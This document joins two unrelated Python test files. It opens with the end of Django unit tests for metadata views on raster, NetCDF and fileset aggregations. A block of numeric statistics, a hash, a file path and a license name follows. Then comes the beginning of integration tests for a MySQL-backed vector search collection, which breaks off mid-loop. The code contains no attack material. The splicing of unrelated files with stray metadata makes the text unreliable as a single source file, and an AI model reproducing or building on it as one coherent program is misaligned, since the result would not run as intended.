    request.user = self.user
    # this the view function we are testing
    response = delete_key_value_metadata(request, hs_file_type="GeoRasterLogicalFile",
                                         file_type_id=logical_file.id)
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    response_dict = json.loads(response.content)
    self.assertEqual('success', response_dict['status'])
    res_file = self.composite_resource.files.first()
    logical_file = res_file.logical_file
    # at this point there should not be any key/value metadata
    self.assertEqual(logical_file.metadata.extra_metadata, {})
    self.composite_resource.delete()
def test_CRUD_key_value_metadata_netcdf_aggregation(self):
    """Test 'update_key_value_metadata' and 'delete_key_value_metadata' view
    functions for a NetCDF aggregation.

    Covers create, key+value update, value-only update, and delete of
    extra (key/value) metadata.
    """
    self.create_composite_resource(file_to_upload=self.netcdf_file)
    res_file = self.composite_resource.files.first()
    # set the nc file to NetCDF file type
    NetCDFLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
    res_file = self.composite_resource.files.first()
    logical_file = res_file.logical_file
    self.assertEqual(res_file.logical_file_type_name, "NetCDFLogicalFile")
    # no key/value metadata for the netcdf file type yet
    self.assertEqual(logical_file.metadata.extra_metadata, {})
    url_params = {'hs_file_type': 'NetCDFLogicalFile',
                  'file_type_id': logical_file.id
                  }
    url = reverse('update_file_keyvalue_metadata', kwargs=url_params)
    request = self.factory.post(url, data={'key': 'key-1', 'value': 'value-1'})
    request.user = self.user
    # this is the view function we are testing
    response = update_key_value_metadata(request, hs_file_type="NetCDFLogicalFile",
                                         file_type_id=logical_file.id)
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    response_dict = json.loads(response.content)
    self.assertEqual('success', response_dict['status'])
    # now there should be key/value metadata for the netcdf file type
    res_file = self.composite_resource.files.first()
    logical_file = res_file.logical_file
    self.assertNotEqual(logical_file.metadata.extra_metadata, {})
    self.assertEqual(logical_file.metadata.extra_metadata['key-1'], 'value-1')
    # update existing key value metadata - updating both key and value
    # ('key_original' identifies which existing entry to replace)
    request = self.factory.post(url, data={'key': 'key-2', 'value': 'value-2',
                                           'key_original': 'key-1'})
    request.user = self.user
    response = update_key_value_metadata(request, hs_file_type="NetCDFLogicalFile",
                                         file_type_id=logical_file.id)
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    response_dict = json.loads(response.content)
    self.assertEqual('success', response_dict['status'])
    res_file = self.composite_resource.files.first()
    logical_file = res_file.logical_file
    self.assertEqual(logical_file.metadata.extra_metadata['key-2'], 'value-2')
    self.assertNotIn('key-1', logical_file.metadata.extra_metadata.keys())
    # update existing key value metadata - updating value only
    request = self.factory.post(url, data={'key': 'key-2', 'value': 'value-1',
                                           'key_original': 'key-2'})
    request.user = self.user
    response = update_key_value_metadata(request, hs_file_type="NetCDFLogicalFile",
                                         file_type_id=logical_file.id)
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    response_dict = json.loads(response.content)
    self.assertEqual('success', response_dict['status'])
    res_file = self.composite_resource.files.first()
    logical_file = res_file.logical_file
    self.assertEqual(logical_file.metadata.extra_metadata['key-2'], 'value-1')
    # delete key/value data using the view function
    request = self.factory.post(url, data={'key': 'key-2'})
    request.user = self.user
    # this the view function we are testing
    response = delete_key_value_metadata(request, hs_file_type="NetCDFLogicalFile",
                                         file_type_id=logical_file.id)
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    response_dict = json.loads(response.content)
    self.assertEqual('success', response_dict['status'])
    res_file = self.composite_resource.files.first()
    logical_file = res_file.logical_file
    # at this point there should not be any key/value metadata
    self.assertEqual(logical_file.metadata.extra_metadata, {})
    self.composite_resource.delete()
def test_add_delete_keywords_aggregations(self):
    """Test the 'add_keyword_metadata' and 'delete_keyword_metadata' view
    functions against both raster and netcdf aggregations.
    """
    cases = ((self.raster_file, 'GeoRasterLogicalFile'),
             (self.netcdf_file, 'NetCDFLogicalFile'))
    for upload_file, aggregation_type in cases:
        self._add_delete_keywords_file_type(upload_file, aggregation_type)
def test_update_netcdf_file_for_aggregation(self):
    """Test the 'update_netcdf_file' view function: keyword edits on a NetCDF
    aggregation must be written back into the regenerated ncdump (.txt) file."""
    self.create_composite_resource(file_to_upload=self.netcdf_file)
    res_file = self.composite_resource.files.first()
    # promote the uploaded .nc file to a NetCDF aggregation
    NetCDFLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
    res_file = self.composite_resource.files.first()
    logical_file = res_file.logical_file
    self.assertEqual(res_file.logical_file_type_name, "NetCDFLogicalFile")
    # metadata extraction yields exactly one keyword for this file
    self.assertEqual(len(logical_file.metadata.keywords), 1)
    nc_dump_res_file = next(
        (f for f in logical_file.files.all() if f.extension == ".txt"), None)
    self.assertNotEqual(nc_dump_res_file, None)
    self.assertIn('keywords = "Snow water equivalent"', nc_dump_res_file.resource_file.read())
    # change the aggregation-level keywords, then ask the view to sync the file
    logical_file.metadata.keywords = ["keyword-1", 'keyword-2']
    logical_file.metadata.save()
    url = reverse('update_netcdf_file', kwargs={'file_type_id': logical_file.id})
    request = self.factory.post(url, data={})
    request.user = self.user
    # this is the view function we are testing
    response = update_netcdf_file(request, file_type_id=logical_file.id)
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    self.assertEqual('success', json.loads(response.content)['status'])
    # ncdump file gets regenerated as part of the netcdf file update
    nc_dump_res_file = next(
        (f for f in logical_file.files.all() if f.extension == ".txt"), nc_dump_res_file)
    self.assertNotEqual(nc_dump_res_file, None)
    self.assertIn('keywords = "keyword-1, keyword-2"', nc_dump_res_file.resource_file.read())
    self.composite_resource.delete()
def test_update_sqlite_file_for_aggregation(self):
    """Test the 'update_sqlite_file' view function used to push metadata edits
    back into the sqlite file of a timeseries aggregation."""
    self.create_composite_resource(file_to_upload=self.sqlite_file)
    first_file = self.composite_resource.files.first()
    # promote the sqlite file to a TimeSeries aggregation
    TimeSeriesLogicalFile.set_file_type(self.composite_resource, self.user, first_file.id)
    aggregation = self.composite_resource.files.first().logical_file
    # dirty the metadata so the sqlite file is due for a rewrite
    aggregation.metadata.abstract = "new abstract for time series file type"
    aggregation.metadata.is_dirty = True
    aggregation.metadata.save()
    url = reverse('update_sqlite_file', kwargs={'file_type_id': aggregation.id})
    request = self.factory.post(url, data={})
    request.user = self.user
    # this is the view function we are testing
    response = update_sqlite_file(request, file_type_id=aggregation.id)
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    self.assertEqual('success', json.loads(response.content)['status'])
    self.composite_resource.delete()
def test_update_file_set_coverage_from_contents(self):
    """Here we are testing file set temporal and spatial coverage update using respective
    coverage data from the contained aggregations.

    Tests the 'update_aggregation_coverage' view for both coverage_type values
    ('temporal' and 'spatial'): the fileset's coverage must be replaced by the
    coverage of its contained NetCDF child aggregation.
    """
    self.create_composite_resource()
    new_folder = 'fileset_folder'
    ResourceFile.create_folder(self.composite_resource, new_folder)
    # add the text file to the resource at the above folder
    self.add_file_to_resource(file_to_add=self.text_file, upload_folder=new_folder)
    # set the folder to file set aggregation
    FileSetLogicalFile.set_file_type(self.composite_resource, self.user, folder_path=new_folder)
    fs_aggr = FileSetLogicalFile.objects.first()
    # fileset aggregation should not have any temporal coverage or
    # spatial coverage at this point
    self.assertEqual(fs_aggr.metadata.temporal_coverage, None)
    self.assertEqual(fs_aggr.metadata.spatial_coverage, None)
    # create temporal coverage for file set (deliberately different from the
    # netcdf file's own coverage so the update below is observable)
    value_dict = {'name': 'Name for period coverage', 'start': '1/1/2018', 'end': '12/12/2018'}
    fs_aggr.metadata.create_element('coverage', type='period', value=value_dict)
    # fileset aggregation should have temporal coverage at this point
    self.assertNotEqual(fs_aggr.metadata.temporal_coverage, None)
    # create spatial coverage for file set
    value_dict = {'east': '56.45678', 'north': '12.6789', 'units': 'Decimal degree'}
    fs_aggr.metadata.create_element('coverage', type='point', value=value_dict)
    # fileset aggregation should have spatial coverage at this point
    self.assertNotEqual(fs_aggr.metadata.spatial_coverage, None)
    fs_aggr_path = fs_aggr.aggregation_name
    self.assertEqual(NetCDFLogicalFile.objects.count(), 0)
    # upload a netcdf file to the new_folder - folder that represents the above fileset
    # aggregation
    self.add_files_to_resource(files_to_add=[self.netcdf_file], upload_folder=fs_aggr_path)
    # netcdf child aggregation should have been created
    self.assertEqual(NetCDFLogicalFile.objects.count(), 1)
    nc_aggr = NetCDFLogicalFile.objects.first()
    self.assertTrue(nc_aggr.has_parent)
    # netcdf aggregation should have temporal coverage (extracted from the file)
    self.assertNotEqual(nc_aggr.metadata.temporal_coverage, None)
    # temporal coverage of the fileset aggregation should NOT match with that of the contained
    # netcdf aggregation
    for temp_date in ('start', 'end'):
        self.assertNotEqual(fs_aggr.metadata.temporal_coverage.value[temp_date],
                            nc_aggr.metadata.temporal_coverage.value[temp_date])
    # update file set aggregation temporal coverage from its contained aggregation
    url_params = {'file_type_id': fs_aggr.id,
                  'coverage_type': 'temporal'
                  }
    url = reverse('update_fileset_coverage', kwargs=url_params)
    request = self.factory.post(url)
    request.user = self.user
    # this is the view function we are testing for updating file set temporal coverage
    response = update_aggregation_coverage(request, file_type_id=fs_aggr.id,
                                           coverage_type='temporal')
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    response_dict = json.loads(response.content)
    self.assertEqual('success', response_dict['status'])
    # temporal coverage of the fileset aggregation should now match with that of the contained
    # netcdf aggregation
    for temp_date in ('start', 'end'):
        self.assertEqual(fs_aggr.metadata.temporal_coverage.value[temp_date],
                         nc_aggr.metadata.temporal_coverage.value[temp_date])
    # update file set spatial coverage from contents
    url_params = {'file_type_id': fs_aggr.id,
                  'coverage_type': 'spatial'
                  }
    url = reverse('update_fileset_coverage', kwargs=url_params)
    request = self.factory.post(url)
    request.user = self.user
    # this is the view function we are testing for updating the file set spatial coverage
    response = update_aggregation_coverage(request, file_type_id=fs_aggr.id,
                                           coverage_type='spatial')
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    response_dict = json.loads(response.content)
    self.assertEqual('success', response_dict['status'])
    # test the file set spatial coverage same as that of the NC aggregation
    for limit in ('northlimit', 'eastlimit', 'southlimit', 'westlimit'):
        self.assertEqual(fs_aggr.metadata.spatial_coverage.value[limit],
                         nc_aggr.metadata.spatial_coverage.value[limit])
    self.composite_resource.delete()
def _add_delete_keywords_file_type(self, file_path, file_type):
    """Helper: upload *file_path*, promote it to *file_type*, then exercise the
    'add_keyword_metadata' and 'delete_keyword_metadata' view functions.

    file_type is either 'GeoRasterLogicalFile' or 'NetCDFLogicalFile'; the
    netcdf branch differs because metadata extraction already adds one keyword.
    """
    self.create_composite_resource(file_path)
    res_file = self.composite_resource.files.first()
    # set specific file type
    if file_type == "GeoRasterLogicalFile":
        GeoRasterLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
    else:
        NetCDFLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
    res_file = self.composite_resource.files.first()
    logical_file = res_file.logical_file
    self.assertEqual(res_file.logical_file_type_name, file_type)
    if file_type != "NetCDFLogicalFile":
        # no keyword metadata for the raster file type yet
        self.assertEqual(len(logical_file.metadata.keywords), 0)
    else:
        # one keyword metadata for the netcdf file type (from extraction)
        self.assertEqual(len(logical_file.metadata.keywords), 1)
    # at this point resource should have all the keywords that we have for the file type
    res_keywords = [subject.value for subject in
                    self.composite_resource.metadata.subjects.all()]
    for kw in logical_file.metadata.keywords:
        self.assertIn(kw, res_keywords)
    # add keywords at the file level
    url_params = {'hs_file_type': file_type,
                  'file_type_id': logical_file.id
                  }
    url = reverse('add_file_keyword_metadata', kwargs=url_params)
    request = self.factory.post(url, data={'keywords': 'keyword-1,keyword-2'})
    request.user = self.user
    # this is the view function we are testing
    response = add_keyword_metadata(request, hs_file_type=file_type,
                                    file_type_id=logical_file.id)
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    response_dict = json.loads(response.content)
    self.assertEqual('success', response_dict['status'])
    # there should be 2 keywords for the raster file type (3 for netcdf) now
    res_file = self.composite_resource.files.first()
    logical_file = res_file.logical_file
    if file_type != "NetCDFLogicalFile":
        self.assertEqual(len(logical_file.metadata.keywords), 2)
    else:
        self.assertEqual(len(logical_file.metadata.keywords), 3)
    self.assertIn('keyword-1', logical_file.metadata.keywords)
    self.assertIn('keyword-2', logical_file.metadata.keywords)
    # resource level keywords must have been updated with the keywords we added
    # to file level
    res_keywords = [subject.value for subject in
                    self.composite_resource.metadata.subjects.all()]
    for kw in logical_file.metadata.keywords:
        self.assertIn(kw, res_keywords)
    # delete keyword
    url = reverse('delete_file_keyword_metadata', kwargs=url_params)
    request = self.factory.post(url, data={'keyword': 'keyword-1'})
    request.user = self.user
    # this is the view function we are testing
    response = delete_keyword_metadata(request, hs_file_type=file_type,
                                       file_type_id=logical_file.id)
    self.assertEqual(response.status_code, status.HTTP_200_OK)
    response_dict = json.loads(response.content)
    self.assertEqual('success', response_dict['status'])
    res_file = self.composite_resource.files.first()
    logical_file = res_file.logical_file
    if file_type != "NetCDFLogicalFile":
        self.assertEqual(len(logical_file.metadata.keywords), 1)
    else:
        self.assertEqual(len(logical_file.metadata.keywords), 2)
    self.assertIn('keyword-2', logical_file.metadata.keywords)
    # test that deleting a file level keyword doesn't delete the same keyword from
    # resource level
    self.assertIn('keyword-1', res_keywords)
    self.composite_resource.delete()
| 53.745977
| 100
| 0.677388
| 11,341
| 93,518
| 5.334274
| 0.033948
| 0.057277
| 0.081229
| 0.053293
| 0.914143
| 0.899762
| 0.882488
| 0.865363
| 0.840882
| 0.82822
| 0
| 0.009155
| 0.238435
| 93,518
| 1,739
| 101
| 53.776883
| 0.84027
| 0.165679
| 0
| 0.7725
| 0
| 0
| 0.095312
| 0.015669
| 0
| 0
| 0
| 0
| 0.246667
| 1
| 0.034167
| false
| 0.001667
| 0.009167
| 0
| 0.044167
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c3cbcc386c71883d2a7a0a99c98a9462b69397b2
| 88,071
|
py
|
Python
|
tests/integration/src/case/test_mysql_repository.py
|
divenswu/proximabilin
|
9eb7db8f215e4ac5f43023c725fbc4997c2ccaee
|
[
"Apache-2.0"
] | 103
|
2021-09-30T03:54:41.000Z
|
2022-03-30T09:05:11.000Z
|
tests/integration/src/case/test_mysql_repository.py
|
divenswu/proximabilin
|
9eb7db8f215e4ac5f43023c725fbc4997c2ccaee
|
[
"Apache-2.0"
] | 10
|
2021-11-02T02:31:12.000Z
|
2022-03-24T07:56:21.000Z
|
tests/integration/src/case/test_mysql_repository.py
|
divenswu/proximabilin
|
9eb7db8f215e4ac5f43023c725fbc4997c2ccaee
|
[
"Apache-2.0"
] | 21
|
2021-10-18T04:35:48.000Z
|
2022-03-29T08:04:38.000Z
|
# Copyright 2021 Alibaba, Inc. and its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import struct
import grpc
import unittest
import time
import os
import random
from pyproximabe import *
from global_conf import GlobalConf
from collection_creator import CollectionCreator
from mysql_client import MysqlClient
from server_utils import ServerUtils
import client_helper
class TestMysqlRepository(unittest.TestCase):
def setUp(self):
    """Create the clients/helpers shared by every test and reset server + DB state.

    Drops any collections left behind by a previous run, then replays the
    clean-DB SQL script so each test starts from a known MySQL state.
    """
    self.global_conf = GlobalConf()
    # NOTE: the original assigned self.creator twice; one assignment suffices
    self.creator = CollectionCreator()
    self.client = client_helper.get_client(self.global_conf)
    self.mysql_client = MysqlClient()
    self.server_utils = ServerUtils()
    self.repository_name = "test_repo"
    self.clean_env()
    ret = self.mysql_client.execute_batch_sql("data/test_clean_db.sql")
    self.assertEqual(ret, 0)
def tearDown(self):
    """Per-test cleanup: drop all collections, then pause briefly so the
    server settles before the next test starts."""
    self.clean_env()
    time.sleep(1)
def clean_env(self):
    """Drop every existing collection, asserting that each call succeeds."""
    list_status, existing = self.client.list_collections()
    self.assertTrue(list_status.ok())
    for entry in existing:
        drop_status = self.client.drop_collection(entry.collection_config.collection_name)
        self.assertTrue(drop_status.ok())
def get_content(self, file_name):
src_path = os.getenv('SRC_PATH')
f = open(src_path + '/tests/integration/log/' + file_name, 'r')
return f.read()
def create_schema(self, collection_name,
                  repository_table="test_collection",
                  forward_columns=None,
                  index_columns=None,
                  index_dimensions=None,
                  index_data_types=None,
                  index_measures=None):
    """Build a collection schema bound to mysql repository 'test_repo' / db 'test_db'.

    Defaults: forward columns ['col_a', 'col_b'], no index columns/dimensions.
    (The original used mutable list defaults, which are shared across calls;
    replaced with None sentinels — call-compatible for all existing callers.)
    """
    if forward_columns is None:
        forward_columns = ["col_a", "col_b"]
    if index_columns is None:
        index_columns = []
    if index_dimensions is None:
        index_dimensions = []
    return self.creator.create_schema(collection_name,
                                      repository_table=repository_table,
                                      repository_name="test_repo",
                                      forward_columns=forward_columns,
                                      index_columns=index_columns,
                                      index_dimensions=index_dimensions,
                                      index_data_types=index_data_types,
                                      index_measures=index_measures,
                                      db_name="test_db",
                                      with_repo=True)
def query(self, collection_name, topk=10, column_name='column1'):
    """Run a single linear knn query with a fixed 16-dimension fp32 vector."""
    probe_vector = [1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 1]
    return self.client.query(collection_name,
                             column_name,
                             probe_vector,
                             data_type=DataType.VECTOR_FP32,
                             dimension=16,
                             batch_count=1,
                             topk=topk,
                             is_linear=True)
def create_query(self, collection_name, topk=10, column_name='column1'):
    """Build a raw protobuf QueryRequest equivalent to self.query().

    Uses the same fixed 16-dimension fp32 probe vector and linear search.
    """
    query = query_service_pb2.QueryRequest()
    query.query_type = query_service_pb2.QueryType.QT_KNN
    query.collection_name = collection_name
    query.knn_params.column_name = column_name
    query.knn_params.topk = topk
    query.knn_params.dimension = 16
    query.knn_params.feature_type = common_pb2.FeatureType.FT_FP32
    features = [1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 1]
    # pack all floats in one struct call (identical bytes to the original
    # per-element accumulation, without building an intermediate byte list)
    query.knn_params.features = struct.pack('%df' % len(features), *features)
    query.knn_params.batch_count = 1
    query.knn_params.is_linear = True
    return query
def get_latest_lsn(self, collection_name):
    """Return the latest LSN context reported for *collection_name*."""
    describe_status, description = self.client.describe_collection(collection_name)
    self.assertTrue(describe_status.ok())
    return description.latest_lsn_context
def test_scan_full_table(self):
    """Rows already in the table must be indexed via the full-table scan path."""
    collection_name = 'test_scan_full_table'
    schema = self.create_schema(collection_name,
                                repository_table=collection_name,
                                index_columns=["column1"],
                                index_dimensions=[16])
    status = self.client.create_collection(schema)
    self.assertEqual(status.code, 0)
    ret = self.mysql_client.execute_batch_sql('data/test_scan_table.sql')
    self.assertEqual(ret, 0)
    # give the repository time to scan the table
    time.sleep(2)
    status, response = self.query(collection_name)
    self.assertTrue(status.ok())
    logging.info("query result: %s", response)
    results = response.results
    self.assertEqual(len(results), 1)
    documents = results[0]
    self.assertEqual(len(documents), 2)
    # (primary_key, score, col_a, col_b) per returned document, in rank order
    expected = [(1, 0.0, 11.111, 100),
                (2, 1.0, 12.111, 200)]
    for doc, (pk, score, col_a, col_b) in zip(documents, expected):
        self.assertEqual(doc.primary_key, pk)
        self.assertEqual(doc.score, score)
        self.assertAlmostEqual(doc.forward_column_values['col_a'],
                               col_a, delta=0.000001)
        self.assertEqual(doc.forward_column_values['col_b'], col_b)
def test_scan_full_table_with_empty_table(self):
    """A collection whose source table holds no rows must return zero documents."""
    collection_name = 'full_table_with_empty_table'
    schema = self.create_schema(collection_name,
                                repository_table=collection_name,
                                index_columns=["column1"],
                                index_dimensions=[16])
    create_status = self.client.create_collection(schema)
    self.assertEqual(create_status.code, 0)
    sql_ret = self.mysql_client.execute_batch_sql(
        'data/test_scan_full_table_with_empty_table.sql')
    self.assertEqual(sql_ret, 0)
    # allow the (empty) full-table scan to complete
    time.sleep(2)
    query_status, response = self.query(collection_name)
    self.assertTrue(query_status.ok())
    logging.info("query result: %s", response)
    self.assertEqual(len(response.results), 1)
    self.assertEqual(len(response.results[0]), 0)
def test_increment_mode(self):
    """Full-table scan followed by incremental (binlog) rows: both batches of
    inserted data must become queryable.

    Flow: insert 2 rows -> create collection (full scan indexes them) ->
    insert 5 more rows -> the incremental path picks them up.
    """
    # prepare full table data
    ret = self.mysql_client.execute_batch_sql('data/test_increment_mode_full.sql')
    self.assertEqual(ret, 0)
    # create collection
    collection_name = 'test_increment_mode'
    schema = self.create_schema(collection_name,
                                repository_table=collection_name,
                                index_columns=["column1"],
                                index_dimensions=[16])
    status = self.client.create_collection(schema)
    self.assertEqual(status.code, 0)
    # wait for the full-table scan to finish indexing
    time.sleep(5)
    # query result
    status, response = self.query(collection_name)
    self.assertTrue(status.ok())
    logging.info("query result: %s", response)
    results = response.results
    self.assertEqual(len(results), 1)
    documents = results[0]
    self.assertEqual(len(documents), 2)
    self.assertEqual(documents[0].primary_key, 1)
    self.assertEqual(documents[0].score, 0.0)
    self.assertAlmostEqual(documents[0].forward_column_values['col_a'],
                           11.111, delta=0.000001)
    self.assertEqual(documents[0].forward_column_values['col_b'], 100)
    self.assertEqual(documents[1].primary_key, 2)
    self.assertEqual(documents[1].score, 1.0)
    self.assertAlmostEqual(documents[1].forward_column_values['col_a'],
                           12.111, delta=0.000001)
    self.assertEqual(documents[1].forward_column_values['col_b'], 200)
    # prepare increment table data
    ret = self.mysql_client.execute_batch_sql('data/test_increment_mode_inc.sql')
    self.assertEqual(ret, 0)
    # wait for the incremental rows to be consumed from the binlog
    time.sleep(6)
    # query result
    status, response = self.query(collection_name)
    self.assertTrue(status.ok())
    logging.info("query result: %s", response)
    results = response.results
    self.assertEqual(len(results), 1)
    documents = results[0]
    # 2 full-scan rows + 5 incremental rows, in rank (= primary key) order
    self.assertEqual(len(documents), 7)
    for i in range(0, 7):
        self.assertEqual(documents[i].primary_key, i + 1)
        self.assertEqual(documents[i].score, i * i)
        self.assertAlmostEqual(documents[i].forward_column_values['col_a'],
                               11.111 + i, delta=0.000001)
        self.assertEqual(documents[i].forward_column_values['col_b'], 100 * (i + 1))
def test_forward_with_numeric(self):
    """Numeric forward columns f1..f7 must round-trip through both the
    full-table scan and the incremental (binlog) ingestion path."""
    collection_name = 'test_forward_with_numeric'
    # prepare full table data
    ret = self.mysql_client.execute_batch_sql('data/test_forward_numeric_full.sql')
    self.assertEqual(ret, 0)
    # create collection
    forward_columns=['f1', 'f2', 'f3', 'f4', 'f5', 'f6', 'f7']
    schema = self.create_schema(collection_name,
                                repository_table=collection_name,
                                index_columns=["column1"],
                                forward_columns=forward_columns,
                                index_dimensions=[16])
    status = self.client.create_collection(schema)
    self.assertEqual(status.code, 0)
    # wait for the full-table scan to finish indexing
    time.sleep(5)
    # query result
    status, response = self.query(collection_name)
    self.assertTrue(status.ok())
    logging.info("query result: %s", response)
    results = response.results
    self.assertEqual(len(results), 1)
    documents = results[0]
    total = 4
    self.assertEqual(len(documents), total)
    for i in range(0, total):
        self.assertEqual(documents[i].primary_key, i + 1)
        self.assertEqual(documents[i].score, i * i)
        self.assertEqual(documents[i].forward_column_values['f1'], 121 + i)
        self.assertEqual(documents[i].forward_column_values['f2'], 20001 + i)
        self.assertEqual(documents[i].forward_column_values['f3'], 65601 + i)
        self.assertEqual(documents[i].forward_column_values['f4'], 2000000001 + i)
        self.assertEqual(documents[i].forward_column_values['f5'], 8000000001 + i)
        self.assertAlmostEqual(documents[i].forward_column_values['f6'], 1.1234 + i, delta=0.0001)
        self.assertAlmostEqual(documents[i].forward_column_values['f7'], 1.11223344 + i, delta=0.00001)
    # prepare increment table data
    ret = self.mysql_client.execute_batch_sql('data/test_forward_numeric_inc.sql')
    self.assertEqual(ret, 0)
    # wait for the incremental rows to be consumed from the binlog
    time.sleep(6)
    # query result
    status, response = self.query(collection_name)
    self.assertTrue(status.ok())
    logging.info("query result: %s", response)
    results = response.results
    self.assertEqual(len(results), 1)
    documents = results[0]
    total = 6
    self.assertEqual(len(documents), total)
    # NOTE(review): after the increment fixture, documents start at primary_key 2
    # and f2 is offset by one relative to the full-scan expectations — presumably
    # the .sql deletes/updates row 1; verify against the fixture contents.
    for i in range(1, total + 1):
        self.assertEqual(documents[i - 1].primary_key, i + 1)
        self.assertEqual(documents[i - 1].score, i * i)
        self.assertEqual(documents[i - 1].forward_column_values['f1'], 121 + i)
        self.assertEqual(documents[i - 1].forward_column_values['f2'], 20002 + i)
        self.assertEqual(documents[i - 1].forward_column_values['f3'], 65601 + i)
        self.assertEqual(documents[i - 1].forward_column_values['f4'], 2000000001 + i)
        self.assertEqual(documents[i - 1].forward_column_values['f5'], 8000000001 + i)
        self.assertAlmostEqual(documents[i - 1].forward_column_values['f6'], 1.1234 + i, delta=0.0001)
        self.assertAlmostEqual(documents[i - 1].forward_column_values['f7'], 1.11223344 + i, delta=0.00001)
def test_forward_with_date_and_time(self):
    """date/time/datetime/timestamp/year forward columns must round-trip as
    strings through both the full-scan and incremental ingestion paths."""
    collection_name = 'test_forward_with_date_and_time'
    # prepare full table data
    ret = self.mysql_client.execute_batch_sql('data/test_forward_date_and_time_full.sql')
    self.assertEqual(ret, 0)
    # create collection
    forward_columns=['f1', 'f2', 'f3', 'f4', 'f6']
    schema = self.create_schema(collection_name,
                                repository_table=collection_name,
                                index_columns=["column1"],
                                forward_columns=forward_columns,
                                index_dimensions=[16])
    status = self.client.create_collection(schema)
    self.assertEqual(status.code, 0)
    # wait for the full-table scan to finish indexing
    time.sleep(5)
    # query result
    status, response = self.query(collection_name)
    self.assertTrue(status.ok())
    logging.info("query result: %s", response)
    results = response.results
    self.assertEqual(len(results), 1)
    documents = results[0]
    total = 4
    self.assertEqual(len(documents), total)
    for i in range(0, total):
        self.assertEqual(documents[i].primary_key, i + 1)
        self.assertEqual(documents[i].score, i * i)
        self.assertEqual(documents[i].forward_column_values['f1'], '2021-01-1' + str(i + 2))
        self.assertEqual(documents[i].forward_column_values['f2'], '13:00:0' + str(i + 1))
        self.assertEqual(documents[i].forward_column_values['f3'], '2021-01-1%d 13:00:0%d' % (i + 2, i + 1))
        self.assertEqual(documents[i].forward_column_values['f4'], '2021-01-1%d 13:00:00' % (i + 2))
        self.assertEqual(documents[i].forward_column_values['f6'], '2021')
    # prepare increment table data
    ret = self.mysql_client.execute_batch_sql('data/test_forward_date_and_time_inc.sql')
    self.assertEqual(ret, 0)
    # wait for the incremental rows to be consumed from the binlog
    time.sleep(6)
    # query result
    status, response = self.query(collection_name)
    self.assertTrue(status.ok())
    logging.info("query result: %s", response)
    results = response.results
    self.assertEqual(len(results), 1)
    documents = results[0]
    total = 7
    self.assertEqual(len(documents), total)
    # NOTE(review): documents now start at primary_key 2 — presumably the
    # increment fixture removes/replaces row 1; verify against the .sql file.
    for i in range(1, total + 1):
        self.assertEqual(documents[i-1].primary_key, i + 1)
        self.assertEqual(documents[i-1].score, i * i)
        self.assertEqual(documents[i-1].forward_column_values['f1'], '2021-01-1' + str(i + 2))
        self.assertEqual(documents[i-1].forward_column_values['f2'], '13:00:0' + str(i + 1))
        self.assertEqual(documents[i-1].forward_column_values['f3'], '2021-01-1%d 13:00:0%d' % (i + 2, i + 1))
        self.assertEqual(documents[i-1].forward_column_values['f4'], '2021-01-1%d 13:00:00' % (i + 2))
        self.assertEqual(documents[i-1].forward_column_values['f6'], '2021')
def test_forward_with_date_and_time_included_fracation(self):
    """Like test_forward_with_date_and_time, but the time/datetime/timestamp
    columns carry fractional seconds that must be preserved in the strings."""
    collection_name = 'test_forward_with_date_and_time_frac'
    # prepare full table data
    ret = self.mysql_client.execute_batch_sql('data/test_forward_date_and_time_frac_full.sql')
    self.assertEqual(ret, 0)
    # create collection
    forward_columns=['f1', 'f2', 'f3', 'f4', 'f6']
    schema = self.create_schema(collection_name,
                                repository_table=collection_name,
                                index_columns=["column1"],
                                forward_columns=forward_columns,
                                index_dimensions=[16])
    status = self.client.create_collection(schema)
    self.assertEqual(status.code, 0)
    # wait for the full-table scan to finish indexing
    time.sleep(5)
    # query result
    status, response = self.query(collection_name)
    self.assertTrue(status.ok())
    logging.info("query result: %s", response)
    results = response.results
    self.assertEqual(len(results), 1)
    documents = results[0]
    total = 4
    self.assertEqual(len(documents), total)
    for i in range(0, total):
        self.assertEqual(documents[i].primary_key, i + 1)
        self.assertEqual(documents[i].score, i * i)
        self.assertEqual(documents[i].forward_column_values['f1'], '2021-01-1' + str(i + 2))
        self.assertEqual(documents[i].forward_column_values['f2'], '13:00:0%d.9' %(i + 1))
        self.assertEqual(documents[i].forward_column_values['f3'], '2021-01-1%d 13:00:0%d.123' % (i + 2, i + 1))
        self.assertEqual(documents[i].forward_column_values['f4'], '2021-01-1%d 13:00:00.123456' % (i + 2))
        self.assertEqual(documents[i].forward_column_values['f6'], '2021')
    # prepare increment table data
    ret = self.mysql_client.execute_batch_sql('data/test_forward_date_and_time_frac_inc.sql')
    self.assertEqual(ret, 0)
    # wait for the incremental rows to be consumed from the binlog
    time.sleep(6)
    # query result
    status, response = self.query(collection_name)
    self.assertTrue(status.ok())
    logging.info("query result: %s", response)
    results = response.results
    self.assertEqual(len(results), 1)
    documents = results[0]
    total = 7
    self.assertEqual(len(documents), total)
    # NOTE(review): documents now start at primary_key 2 — presumably the
    # increment fixture removes/replaces row 1; verify against the .sql file.
    for i in range(1, total + 1):
